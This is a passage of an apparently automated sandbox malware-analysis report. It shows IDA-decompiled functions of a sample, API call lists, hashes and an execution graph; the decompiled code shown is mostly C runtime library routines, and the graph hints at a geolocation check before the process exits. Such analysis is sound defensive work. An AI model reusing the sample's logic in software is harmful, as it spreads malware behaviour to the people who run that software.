											} else {
												__eflags =  *_t101 & 0x00000004;
												_t79 = 0;
												_t75 = (_t79 & 0xffffff00 | ( *_t101 & 0x00000004) != 0x00000000) + 1;
												__eflags = _t75;
												 *(_t111 - 0x20) = _t75;
												goto L29;
											}
										}
									} else {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												E00402B70(_t107, E0040205C(_t84,  &(_t101[8])), _t101[0x14]);
												goto L29;
											}
										}
									}
								} else {
									__eflags =  *(_t54 + 0x18);
									if( *(_t54 + 0x18) == 0) {
										goto L32;
									} else {
										__eflags = _t107;
										if(_t107 == 0) {
											goto L32;
										} else {
											E00402B70(_t107,  *(_t54 + 0x18), _t101[0x14]);
											__eflags = _t101[0x14] - 4;
											if(_t101[0x14] == 4) {
												__eflags =  *_t107;
												if( *_t107 != 0) {
													_push( &(_t101[8]));
													_push( *_t107);
													goto L21;
												}
											}
											goto L29;
										}
									}
								}
							} else {
								_t84 =  *(_t54 + 0x18);
								goto L12;
							}
						} else {
							_t71 =  *0x418c94; // 0x0
							 *((intOrPtr*)(_t111 - 0x1c)) = _t71;
							if(_t71 == 0) {
								goto L10;
							} else {
								 *0x4111f0();
								_t84 =  *((intOrPtr*)(_t111 - 0x1c))();
								L12:
								if(_t84 == 0 || _t107 == 0) {
									L32:
									E0040623E(_t75, _t84, _t97, _t107);
									asm("int3");
									_push(8);
									_push(0x4165e8);
									E004019C0(_t75, _t101, _t107);
									_t98 =  *(_t111 + 0x10);
									_t85 =  *(_t111 + 0xc);
									__eflags =  *_t98;
									if(__eflags >= 0) {
										_t103 = _t85 + 0xc + _t98[2];
										__eflags = _t85 + 0xc + _t98[2];
									} else {
										_t103 = _t85;
									}
									 *(_t111 - 4) =  *(_t111 - 4) & 0x00000000;
									_t108 =  *(_t111 + 0x14);
									_push( *(_t111 + 0x14));
									_push(_t98);
									_push(_t85);
									_t77 =  *((intOrPtr*)(_t111 + 8));
									_push( *((intOrPtr*)(_t111 + 8)));
									_t58 = E004030E4(_t77, _t103, _t108, __eflags) - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										_t61 = E00403E54(_t103, _t108[0x18], E0040205C( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])));
									} else {
										_t61 = _t58 - 1;
										__eflags = _t61;
										if(_t61 == 0) {
											_t61 = E00403E64(_t103, _t108[0x18], E0040205C( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])), 1);
										}
									}
									 *(_t111 - 4) = 0xfffffffe;
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t61;
								} else {
									 *_t107 = _t84;
									_push( &(_t101[8]));
									_push(_t84);
									L21:
									 *_t107 = E0040205C();
									L29:
									 *(_t111 - 4) = 0xfffffffe;
									_t53 = _t75;
									L31:
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t53;
								}
							}
						}
					} else {
						goto L30;
					}
				}
			}



















                                                              0x004030e4
                                                              0x004030e6
                                                              0x004030eb
                                                              0x004030f0
                                                              0x004030f2
                                                              0x004030f5
                                                              0x004030fa
                                                              0x0040320a
                                                              0x0040320a
                                                              0x0040320a
                                                              0x00000000
                                                              0x00403109
                                                              0x00403109
                                                              0x0040310e
                                                              0x00403118
                                                              0x0040311a
                                                              0x0040311f
                                                              0x00403124
                                                              0x00403124
                                                              0x00403126
                                                              0x00403129
                                                              0x0040312e
                                                              0x00403150
                                                              0x00403150
                                                              0x00403153
                                                              0x00403156
                                                              0x00403174
                                                              0x00403177
                                                              0x004031b6
                                                              0x004031b9
                                                              0x004031bc
                                                              0x004031e1
                                                              0x004031e3
                                                              0x00000000
                                                              0x004031e5
                                                              0x004031e5
                                                              0x004031e7
                                                              0x00000000
                                                              0x004031e9
                                                              0x004031e9
                                                              0x004031ee
                                                              0x004031f2
                                                              0x004031f2
                                                              0x004031f3
                                                              0x00000000
                                                              0x004031f3
                                                              0x004031e7
                                                              0x004031be
                                                              0x004031be
                                                              0x004031c0
                                                              0x00000000
                                                              0x004031c2
                                                              0x004031c2
                                                              0x004031c4
                                                              0x00000000
                                                              0x004031c6
                                                              0x004031d7
                                                              0x00000000
                                                              0x004031dc
                                                              0x004031c4
                                                              0x004031c0
                                                              0x00403179
                                                              0x00403179
                                                              0x0040317d
                                                              0x00000000
                                                              0x00403183
                                                              0x00403183
                                                              0x00403185
                                                              0x00000000
                                                              0x0040318b
                                                              0x00403192
                                                              0x0040319a
                                                              0x0040319e
                                                              0x004031a0
                                                              0x004031a3
                                                              0x004031a8
                                                              0x004031a9
                                                              0x00000000
                                                              0x004031a9
                                                              0x004031a3
                                                              0x00000000
                                                              0x0040319e
                                                              0x00403185
                                                              0x0040317d
                                                              0x00403158
                                                              0x00403158
                                                              0x00000000
                                                              0x00403158
                                                              0x00403135
                                                              0x00403135
                                                              0x0040313a
                                                              0x0040313f
                                                              0x00000000
                                                              0x00403141
                                                              0x00403143
                                                              0x0040314c
                                                              0x0040315b
                                                              0x0040315d
                                                              0x0040321c
                                                              0x0040321c
                                                              0x00403221
                                                              0x00403222
                                                              0x00403224
                                                              0x00403229
                                                              0x0040322e
                                                              0x00403231
                                                              0x00403234
                                                              0x00403237
                                                              0x00403240
                                                              0x00403240
                                                              0x00403239
                                                              0x00403239
                                                              0x00403239
                                                              0x00403243
                                                              0x00403247
                                                              0x0040324a
                                                              0x0040324b
                                                              0x0040324c
                                                              0x0040324d
                                                              0x00403250
                                                              0x00403259
                                                              0x00403259
                                                              0x0040325c
                                                              0x00403292
                                                              0x0040325e
                                                              0x0040325e
                                                              0x0040325e
                                                              0x00403261
                                                              0x00403278
                                                              0x00403278
                                                              0x00403261
                                                              0x00403297
                                                              0x004032a1
                                                              0x004032ad
                                                              0x0040316b
                                                              0x0040316b
                                                              0x00403170
                                                              0x00403171
                                                              0x004031ab
                                                              0x004031b2
                                                              0x004031f6
                                                              0x004031f6
                                                              0x004031fd
                                                              0x0040320c
                                                              0x0040320f
                                                              0x0040321b
                                                              0x0040321b
                                                              0x0040315d
                                                              0x0040313f
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040310e

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.321408204.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.321402306.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321436943.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321447961.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID: AdjustPointer
                                                              • String ID:
                                                              • API String ID: 1740715915-0
                                                              • Opcode ID: 793730f094be1da67d355f7f23bf5be4a42a2e349e64329e165711bbad5115bb
                                                              • Instruction ID: 0eee83ce428f6a2d5fb7d7f8cdde5a3b4e88414a42be58dcce2751d31cc34b02
                                                              • Opcode Fuzzy Hash: 793730f094be1da67d355f7f23bf5be4a42a2e349e64329e165711bbad5115bb
                                                              • Instruction Fuzzy Hash: FC510172600302AFDB289F55C941BABBBA8EF58306F14417FE9056B2D1D739EE41C798
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00408798 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00408798(intOrPtr* _a4, intOrPtr _a8, void* _a12, intOrPtr _a16) {
				intOrPtr _t17;
				intOrPtr _t18;
				intOrPtr _t20;
				intOrPtr _t30;
				char _t32;
				intOrPtr _t40;
				intOrPtr* _t42;
				intOrPtr _t43;

				_t42 = _a4;
				if(_t42 != 0) {
					_t32 = 0;
					__eflags =  *_t42;
					if( *_t42 != 0) {
						_t17 = E00409A30(_a16, 0, _t42, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t17;
						if(_t17 != 0) {
							_t40 = _a8;
							__eflags = _t17 -  *((intOrPtr*)(_t40 + 0xc));
							if(__eflags <= 0) {
								L11:
								_t18 = E00408D53(_a16, _t42,  *((intOrPtr*)(_t40 + 8)),  *((intOrPtr*)(_t40 + 0xc)));
								__eflags = _t18;
								if(_t18 != 0) {
									 *((intOrPtr*)(_t40 + 0x10)) = _t18 - 1;
									_t20 = 0;
									__eflags = 0;
								} else {
									E00407B10(GetLastError());
									_t20 =  *((intOrPtr*)(E00407B6A()));
								}
								L14:
								return _t20;
							}
							_t20 = E00408DD0(_t40, __eflags, _t17);
							__eflags = _t20;
							if(_t20 != 0) {
								goto L14;
							}
							goto L11;
						}
						E00407B10(GetLastError());
						return  *((intOrPtr*)(E00407B6A()));
					}
					_t43 = _a8;
					__eflags =  *((intOrPtr*)(_t43 + 0xc));
					if(__eflags != 0) {
						L6:
						 *((char*)( *((intOrPtr*)(_t43 + 8)))) = _t32;
						L2:
						 *((intOrPtr*)(_t43 + 0x10)) = _t32;
						return 0;
					}
					_t30 = E00408DD0(_t43, __eflags, 1);
					__eflags = _t30;
					if(_t30 != 0) {
						return _t30;
					}
					goto L6;
				}
				_t43 = _a8;
				E00408DB6(_t43);
				_t32 = 0;
				 *((intOrPtr*)(_t43 + 8)) = 0;
				 *((intOrPtr*)(_t43 + 0xc)) = 0;
				goto L2;
			}











                                                              0x0040879f
                                                              0x004087a4
                                                              0x004087c2
                                                              0x004087c4
                                                              0x004087c7
                                                              0x004087f0
                                                              0x004087f8
                                                              0x004087fa
                                                              0x00408813
                                                              0x00408816
                                                              0x00408819
                                                              0x00408827
                                                              0x00408834
                                                              0x00408839
                                                              0x0040883b
                                                              0x00408854
                                                              0x00408857
                                                              0x00408857
                                                              0x0040883d
                                                              0x00408844
                                                              0x0040884f
                                                              0x0040884f
                                                              0x00408859
                                                              0x00000000
                                                              0x00408859
                                                              0x0040881e
                                                              0x00408823
                                                              0x00408825
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00408825
                                                              0x00408803
                                                              0x00000000
                                                              0x0040880e
                                                              0x004087c9
                                                              0x004087cc
                                                              0x004087cf
                                                              0x004087de
                                                              0x004087e1
                                                              0x004087b8
                                                              0x004087b8
                                                              0x00000000
                                                              0x004087bb
                                                              0x004087d5
                                                              0x004087da
                                                              0x004087dc
                                                              0x0040885d
                                                              0x0040885d
                                                              0x00000000
                                                              0x004087dc
                                                              0x004087a6
                                                              0x004087ab
                                                              0x004087b0
                                                              0x004087b2
                                                              0x004087b5
                                                              0x00000000

                                                              APIs
                                                                • Part of subcall function 00409A30: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0040DBAF,?,00000000,-00000008), ref: 00409A91
                                                              • GetLastError.KERNEL32 ref: 004087FC
                                                              • __dosmaperr.LIBCMT ref: 00408803
                                                              • GetLastError.KERNEL32(?,?,?,?), ref: 0040883D
                                                              • __dosmaperr.LIBCMT ref: 00408844
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.321408204.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.321402306.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321436943.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321447961.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                              • String ID:
                                                              • API String ID: 1913693674-0
                                                              • Opcode ID: 2380bed64d21907d5dfc4457df022d76c3bcdbd0a8f3fafbb88adcd9f318a4a4
                                                              • Instruction ID: 972515f50ef534669a89da3669eed9dd7ed1a2d4ff75e1d4c3f63b72d9058425
                                                              • Opcode Fuzzy Hash: 2380bed64d21907d5dfc4457df022d76c3bcdbd0a8f3fafbb88adcd9f318a4a4
                                                              • Instruction Fuzzy Hash: 0B21C732600205AFCB10BF628D8086B77A8EF54368710C93EF995B72D0DF38EC408799
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0040F118 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E0040F118(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x4188a0, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E0040F101();
					E0040F0C3();
					_t13 = WriteConsoleW( *0x4188a0, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}




                                                              0x0040f135
                                                              0x0040f139
                                                              0x0040f146
                                                              0x0040f14b
                                                              0x0040f166
                                                              0x0040f166
                                                              0x0040f16c

                                                              APIs
                                                              • WriteConsoleW.KERNEL32(00000000,00000000,00404AFF,00000000,00000000,?,0040E78E,00000000,00000001,?,?,?,0040CBF2,?,00000000,00000000), ref: 0040F12F
                                                              • GetLastError.KERNEL32(?,0040E78E,00000000,00000001,?,?,?,0040CBF2,?,00000000,00000000,?,?,?,0040D1CC,00000000), ref: 0040F13B
                                                                • Part of subcall function 0040F101: CloseHandle.KERNEL32(FFFFFFFE,0040F14B,?,0040E78E,00000000,00000001,?,?,?,0040CBF2,?,00000000,00000000,?,?), ref: 0040F111
                                                              • ___initconout.LIBCMT ref: 0040F14B
                                                                • Part of subcall function 0040F0C3: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0040F0F2,0040E77B,?,?,0040CBF2,?,00000000,00000000,?), ref: 0040F0D6
                                                              • WriteConsoleW.KERNEL32(00000000,00000000,00404AFF,00000000,?,0040E78E,00000000,00000001,?,?,?,0040CBF2,?,00000000,00000000,?), ref: 0040F160
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.321408204.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.321402306.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321436943.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321447961.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                              • String ID:
                                                              • API String ID: 2744216297-0
                                                              • Opcode ID: fa38966b5174c12e011f1d29460e60b6ccd418f6c39747bd92832199a799d301
                                                              • Instruction ID: 23ad264d729cb3fda557c1c1da3f34fdf71add76c7ca5d843bb2f0a27f73c11d
                                                              • Opcode Fuzzy Hash: fa38966b5174c12e011f1d29460e60b6ccd418f6c39747bd92832199a799d301
                                                              • Instruction Fuzzy Hash: 27F01C3A901154FBCF322F95DC04DCA3F66EF483A1B408035FE08A5570CA368C60DBA9
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 004036E0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              C-Code - Quality: 65%
                                                              			E004036E0(void* __ecx, void* __edx, signed char* _a4, signed char* _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v36;
				void* _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v56;
				void _v60;
				signed char* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t74;
				void* _t75;
				char _t76;
				signed char _t78;
				signed int _t80;
				signed char* _t81;
				signed int _t82;
				signed int _t83;
				intOrPtr* _t87;
				void* _t90;
				signed char* _t93;
				intOrPtr* _t96;
				signed char _t97;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr* _t101;
				signed int _t102;
				signed int _t103;
				signed char _t108;
				signed char* _t111;
				signed int _t112;
				signed char* _t116;
				void* _t121;
				signed int _t123;
				void* _t130;
				void* _t131;

				_t110 = __edx;
				_t100 = __ecx;
				_t96 = _a4;
				if( *_t96 == 0x80000003) {
					return _t74;
				} else {
					_push(_t121);
					_t75 = E00402403(_t96, __ecx, __edx, _t121);
					if( *((intOrPtr*)(_t75 + 8)) != 0) {
						__imp__EncodePointer(0);
						_t121 = _t75;
						if( *((intOrPtr*)(E00402403(_t96, __ecx, __edx, _t121) + 8)) != _t121 &&  *_t96 != 0xe0434f4d &&  *_t96 != 0xe0434352) {
							_t87 = E00402881(__edx, _t121, _t96, _a8, _a12, _a16, _a20, _a28, _a32);
							_t130 = _t130 + 0x1c;
							if(_t87 != 0) {
								L16:
								return _t87;
							}
						}
					}
					_t76 = _a20;
					_v24 = _t76;
					_v20 = 0;
					if( *((intOrPtr*)(_t76 + 0xc)) > 0) {
						_push(_a28);
						E004027B4(_t96, _t100, 0, _t121,  &_v40,  &_v24, _a24, _a16, _t76);
						_t112 = _v36;
						_t131 = _t130 + 0x18;
						_t87 = _v40;
						_v16 = _t87;
						_v8 = _t112;
						if(_t112 < _v28) {
							_t102 = _t112 * 0x14;
							_v12 = _t102;
							do {
								_t103 = 5;
								_t90 = memcpy( &_v60,  *((intOrPtr*)( *_t87 + 0x10)) + _t102, _t103 << 2);
								_t131 = _t131 + 0xc;
								if(_v60 <= _t90 && _t90 <= _v56) {
									_t93 = _v44 + 0xfffffff0 + (_v48 << 4);
									_t108 = _t93[4];
									if(_t108 == 0 ||  *((char*)(_t108 + 8)) == 0) {
										if(( *_t93 & 0x00000040) == 0) {
											_push(0);
											_push(1);
											E004032BB(_t112, _t96, _a8, _a12, _a16, _a20, _t93, 0,  &_v60, _a28, _a32);
											_t112 = _v8;
											_t131 = _t131 + 0x30;
										}
									}
								}
								_t112 = _t112 + 1;
								_t87 = _v16;
								_t102 = _v12 + 0x14;
								_v8 = _t112;
								_v12 = _t102;
							} while (_t112 < _v28);
						}
						goto L16;
					}
					E0040623E(_t96, _t100, _t110, _t121);
					asm("int3");
					_t111 = _v68;
					_push(_t96);
					_push(_t121);
					_push(0);
					_t78 = _t111[4];
					if(_t78 == 0) {
						L41:
						_t80 = 1;
					} else {
						_t101 = _t78 + 8;
						if( *_t101 == 0) {
							goto L41;
						} else {
							_t116 = _a4;
							if(( *_t111 & 0x00000080) == 0 || ( *_t116 & 0x00000010) == 0) {
								_t97 = _t116[4];
								_t123 = 0;
								if(_t78 == _t97) {
									L33:
									if(( *_t116 & 0x00000002) == 0 || ( *_t111 & 0x00000008) != 0) {
										_t81 = _a8;
										if(( *_t81 & 0x00000001) == 0 || ( *_t111 & 0x00000001) != 0) {
											if(( *_t81 & 0x00000002) == 0 || ( *_t111 & 0x00000002) != 0) {
												_t123 = 1;
											}
										}
									}
									_t80 = _t123;
								} else {
									_t59 = _t97 + 8; // 0x6e
									_t82 = _t59;
									while(1) {
										_t98 =  *_t101;
										if(_t98 !=  *_t82) {
											break;
										}
										if(_t98 == 0) {
											L29:
											_t83 = _t123;
										} else {
											_t99 =  *((intOrPtr*)(_t101 + 1));
											if(_t99 !=  *((intOrPtr*)(_t82 + 1))) {
												break;
											} else {
												_t101 = _t101 + 2;
												_t82 = _t82 + 2;
												if(_t99 != 0) {
													continue;
												} else {
													goto L29;
												}
											}
										}
										L31:
										if(_t83 == 0) {
											goto L33;
										} else {
											_t80 = 0;
										}
										goto L42;
									}
									asm("sbb eax, eax");
									_t83 = _t82 | 0x00000001;
									goto L31;
								}
							} else {
								goto L41;
							}
						}
					}
					L42:
					return _t80;
				}
			}













































                                                              0x004036e0
                                                              0x004036e0
                                                              0x004036e7
                                                              0x004036f0
                                                              0x0040380f
                                                              0x004036f6
                                                              0x004036f6
                                                              0x004036f8
                                                              0x00403702
                                                              0x00403705
                                                              0x0040370b
                                                              0x00403715
                                                              0x0040373a
                                                              0x0040373f
                                                              0x00403744
                                                              0x0040380b
                                                              0x00000000
                                                              0x0040380c
                                                              0x00403744
                                                              0x00403715
                                                              0x0040374a
                                                              0x0040374d
                                                              0x00403750
                                                              0x00403756
                                                              0x0040375c
                                                              0x0040376e
                                                              0x00403773
                                                              0x00403776
                                                              0x00403779
                                                              0x0040377c
                                                              0x0040377f
                                                              0x00403785
                                                              0x0040378b
                                                              0x0040378e
                                                              0x00403791
                                                              0x004037a0
                                                              0x004037a1
                                                              0x004037a1
                                                              0x004037a6
                                                              0x004037b9
                                                              0x004037bb
                                                              0x004037c0
                                                              0x004037cb
                                                              0x004037cd
                                                              0x004037cf
                                                              0x004037eb
                                                              0x004037f0
                                                              0x004037f3
                                                              0x004037f3
                                                              0x004037cb
                                                              0x004037c0
                                                              0x004037f9
                                                              0x004037fa
                                                              0x004037fd
                                                              0x00403800
                                                              0x00403803
                                                              0x00403806
                                                              0x00403791
                                                              0x00000000
                                                              0x00403785
                                                              0x00403810
                                                              0x00403815
                                                              0x00403819
                                                              0x0040381c
                                                              0x0040381d
                                                              0x0040381e
                                                              0x0040381f
                                                              0x00403824
                                                              0x0040389c
                                                              0x0040389e
                                                              0x00403826
                                                              0x00403826
                                                              0x0040382c
                                                              0x00000000
                                                              0x0040382e
                                                              0x00403831
                                                              0x00403834
                                                              0x0040383b
                                                              0x0040383e
                                                              0x00403842
                                                              0x00403874
                                                              0x00403877
                                                              0x0040387e
                                                              0x00403884
                                                              0x0040388e
                                                              0x00403897
                                                              0x00403897
                                                              0x0040388e
                                                              0x00403884
                                                              0x00403898
                                                              0x00403844
                                                              0x00403844
                                                              0x00403844
                                                              0x00403847
                                                              0x00403847
                                                              0x0040384b
                                                              0x00000000
                                                              0x00000000
                                                              0x0040384f
                                                              0x00403863
                                                              0x00403863
                                                              0x00403851
                                                              0x00403851
                                                              0x00403857
                                                              0x00000000
                                                              0x00403859
                                                              0x00403859
                                                              0x0040385c
                                                              0x00403861
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00403861
                                                              0x00403857
                                                              0x0040386c
                                                              0x0040386e
                                                              0x00000000
                                                              0x00403870
                                                              0x00403870
                                                              0x00403870
                                                              0x00000000
                                                              0x0040386e
                                                              0x00403867
                                                              0x00403869
                                                              0x00000000
                                                              0x00403869
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00403834
                                                              0x0040382c
                                                              0x0040389f
                                                              0x004038a3
                                                              0x004038a3

                                                              APIs
                                                              • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00403705
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.321408204.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.321402306.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321436943.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321447961.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID: EncodePointer
                                                              • String ID: MOC$RCC
                                                              • API String ID: 2118026453-2084237596
                                                              • Opcode ID: 00d0e1f1b77c4b1278f63ae4e7bf7ddda63b466b9ddc3a445dd5d16418ad00af
                                                              • Instruction ID: 26e6ef2ac78d9669040f947cc7e512453069a3445d94063a297bb2325bcafb7a
                                                              • Opcode Fuzzy Hash: 00d0e1f1b77c4b1278f63ae4e7bf7ddda63b466b9ddc3a445dd5d16418ad00af
                                                              • Instruction Fuzzy Hash: 6B419CB2900209AFCF16DF94CD81AEE7FB9BF08305F1480AAF90477291D3399A51DB54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00405B41 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00405B41() {

				 *0x418e7c = GetCommandLineA();
				 *0x418e80 = GetCommandLineW();
				return 1;
			}



                                                              0x00405b47
                                                              0x00405b52
                                                              0x00405b59

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.321408204.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.321402306.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321436943.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321447961.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID: CommandLine
                                                              • String ID: 4K
                                                              • API String ID: 3253501508-2636706845
                                                              • Opcode ID: f20c8cddc90e79d8550de3671dd31650b1c90833b942a4a77989363871e03413
                                                              • Instruction ID: f7364bfb3bd3cd80012c35476f0112e814084956367fd3282b47edc9b2285101
                                                              • Opcode Fuzzy Hash: f20c8cddc90e79d8550de3671dd31650b1c90833b942a4a77989363871e03413
                                                              • Instruction Fuzzy Hash: 8AB04878C403448B87008F30A8182C83EA4B31C202380C07ADA29C2A30EB754044DF18
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Execution Graph

                                                              Execution Coverage:4.1%
                                                              Dynamic/Decrypted Code Coverage:2.5%
                                                              Signature Coverage:4.7%
                                                              Total number of Nodes:632
                                                              Total number of Limit Nodes:82
                                                              execution_graph 30988 41ffe3 30991 41e6c3 30988->30991 30996 41f0f3 30991->30996 30993 41e6df 31000 a69a00 LdrInitializeThunk 30993->31000 30994 41e6fa 30997 41f178 30996->30997 30999 41f102 30996->30999 30997->30993 30999->30997 31001 419503 30999->31001 31000->30994 31002 41951d 31001->31002 31004 419511 31001->31004 31002->30997 31004->31002 31006 419983 LdrLoadDll 31004->31006 31005 41966f 31005->30997 31006->31005 31007 4016e3 31008 4016ad 31007->31008 31008->31008 31011 4232d3 31008->31011 31014 41fb23 31011->31014 31015 41fb49 31014->31015 31028 40be53 31015->31028 31017 41fb55 31027 40179c 31017->31027 31036 410013 31017->31036 31019 41fb74 31020 41fb87 31019->31020 31048 40ffd3 31019->31048 31023 41fb9c 31020->31023 31057 41e7f3 31020->31057 31053 403503 31023->31053 31025 41fbab 31026 41e7f3 2 API calls 31025->31026 31026->31027 31029 40be60 31028->31029 31060 40bda3 31028->31060 31031 40be67 31029->31031 31072 40bd43 31029->31072 31031->31017 31037 41003f 31036->31037 31471 40d393 31037->31471 31039 410051 31475 40fee3 31039->31475 31042 410084 31046 41e5d3 2 API calls 31042->31046 31047 410095 31042->31047 31043 41006c 31044 41e5d3 2 API calls 31043->31044 31045 410077 31043->31045 31044->31045 31045->31019 31046->31047 31047->31019 31049 419503 LdrLoadDll 31048->31049 31050 40fff2 31049->31050 31051 40fff9 31050->31051 31052 40fffb GetUserGeoID 31050->31052 31051->31020 31052->31020 31054 40355a 31053->31054 31056 403567 31054->31056 31494 40dd23 31054->31494 31056->31025 31058 41e812 ExitProcess 31057->31058 31059 41f0f3 LdrLoadDll 31057->31059 31059->31058 31061 40bdb6 31060->31061 31111 41cda3 LdrLoadDll 31060->31111 31091 41cc73 31061->31091 31064 40bdc9 31064->31029 31065 40bdbf 31065->31064 31094 41f473 31065->31094 31067 40be06 31067->31064 31105 40bbe3 31067->31105 31069 40be26 31112 40b643 LdrLoadDll 31069->31112 31071 40be38 31071->31029 31073 40bd60 31072->31073 31074 41f763 LdrLoadDll 31072->31074 31446 41f763 31073->31446 31074->31073 31077 41f763 LdrLoadDll 31078 40bd8d 31077->31078 31079 40fdd3 31078->31079 31080 40fdec 31079->31080 31454 40d213 31080->31454 31082 40fdff 31458 41e323 31082->31458 31085 40be78 31085->31017 31087 40fe25 31088 40fe50 31087->31088 31464 41e3a3 31087->31464 31090 41e5d3 2 API calls 31088->31090 31090->31085 31113 41e743 31091->31113 31095 41f48c 31094->31095 31116 4190f3 31095->31116 31097 41f4a4 31098 41f4ad 31097->31098 31155 41f2b3 31097->31155 31098->31067 31100 41f4c1 31100->31098 31172 41e043 31100->31172 31102 41f4f5 31177 420023 31102->31177 31424 4093f3 31105->31424 31107 40bc04 31107->31069 31108 40bbfd 31108->31107 31437 4096b3 31108->31437 31111->31061 31112->31071 31114 41f0f3 LdrLoadDll 31113->31114 31115 41cc88 31113->31115 31114->31115 31115->31065 31117 419436 31116->31117 31118 419107 31116->31118 31117->31097 31118->31117 31180 41dd93 31118->31180 31121 419238 31183 41e4a3 31121->31183 31122 41921b 31240 41e5a3 LdrLoadDll 31122->31240 31125 419225 31125->31097 31126 41925f 31127 420023 2 API calls 31126->31127 31131 41926b 31127->31131 31128 4193fa 31129 41e5d3 2 API calls 31128->31129 31132 419401 31129->31132 31130 419410 31249 418e13 LdrLoadDll NtReadFile NtClose 31130->31249 31131->31125 31131->31128 31131->31130 31135 419303 31131->31135 31132->31097 31134 419423 31134->31097 31136 41936a 31135->31136 31138 419312 31135->31138 31136->31128 31137 41937d 31136->31137 31242 41e423 31137->31242 31140 419317 31138->31140 31141 41932b 31138->31141 31241 